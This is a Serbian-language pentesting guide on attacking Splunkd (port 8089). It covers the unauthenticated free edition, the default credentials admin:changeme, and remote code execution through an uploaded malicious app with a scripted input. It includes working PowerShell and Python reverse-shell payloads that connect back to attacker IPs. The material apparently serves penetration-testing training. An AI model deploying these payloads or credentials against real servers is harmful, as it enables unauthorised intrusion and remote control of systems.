8089 - Pentesting Splunkd

Osnovne informacije

• Alat za analizu logova koji se koristi za prikupljanje podataka, analizu i vizualizaciju

• Često se koristi u bezbednosnom nadzoru i poslovnoj analitici

• Podrazumevani portovi:

• Web server: 8000

• Splunkd servis: 8089

Vektori ranjivosti:

1. Iskorišćavanje besplatne verzije

• Probna verzija se automatski pretvara u besplatnu verziju nakon 60 dana

• Besplatna verzija nema autentifikaciju

• Potencijalni bezbednosni rizik ako se ne upravlja

• Administratori mogu zanemariti bezbednosne implikacije

1. Slabosti kredencijala

• Starije verzije: Podrazumevani kredencijali admin:changeme

• Novije verzije: Kredencijali postavljeni tokom instalacije

• Potencijal za korišćenje slabih lozinki (npr., admin, Welcome, Password123)

1. Mogućnosti daljinskog izvršenja koda

• Više metoda izvršenja koda:

• Server-side Django aplikacije

• REST krajnje tačke

• Skriptovani ulazi

• Skripte za upozorenje

• Podrška za više platformi (Windows/Linux)

• Skriptovani ulazi mogu pokretati:

• Bash skripte

• PowerShell skripte

• Batch skripte

Ključni potencijal za iskorišćavanje:

• Skladištenje osetljivih podataka

• Nedostatak autentifikacije u besplatnoj verziji

• Više vektora za potencijalno daljinsko izvršenje koda

• Mogućnost korišćenja skriptovanih ulaza za kompromitaciju sistema

Shodan

• Splunk build

RCE

Kreirajte prilagođenu aplikaciju

Splunk nudi sofisticiranu metodu za daljinsko izvršenje koda kroz implementaciju prilagođene aplikacije, koristeći svoje mogućnosti skriptovanja na više platformi. Osnovna tehnika iskorišćavanja se vrti oko kreiranja zlonamerne aplikacije koja može izvršavati reverzne ljuske na Windows i Linux sistemima.

Prilagođena aplikacija može pokretati Python, Batch, Bash ili PowerShell skripte. Štaviše, Splunk dolazi sa instaliranim Python-om, tako da čak i na Windows sistemima možete pokretati Python kod.

Možete koristiti ovaj primer sa bin koji sadrži primer za Python i PowerShell. Ili možete kreirati svoj.

Proces iskorišćavanja prati doslednu metodologiju širom platformi:

splunk_shell/
├── bin        (reverse shell scripts)
└── default    (inputs.conf configuration)

Kritična konfiguraciona datoteka inputs.conf omogućava skriptu na sledeći način:

• Postavljanjem disabled = 0

• Konfigurišući interval izvršenja od 10 sekundi

• Definisanjem tipa izvora skripte

Implementacija je jednostavna:

1. Kreirajte paket zlonamerne aplikacije

2. Postavite slušalac (Netcat/socat) na napadačkom računaru

3. Otpremite aplikaciju putem Splunk-ovog interfejsa

4. Pokrenite automatsko izvršenje skripte prilikom otpremanja

Primer Windows PowerShell reverz shell-a:

$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
};
$client.Close()

Primer Linux Python reverz shell-a:

import sys, socket, os, pty
ip = "10.10.14.15"
port = "443"
s = socket.socket()
s.connect((ip, int(port)))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
pty.spawn('/bin/bash')

RCE & Privilege Escalation

Na sledećoj stranici možete pronaći objašnjenje kako se ova usluga može zloupotrebiti za eskalaciju privilegija i dobijanje postojanosti:

References

• https://academy.hackthebox.com/module/113/section/1213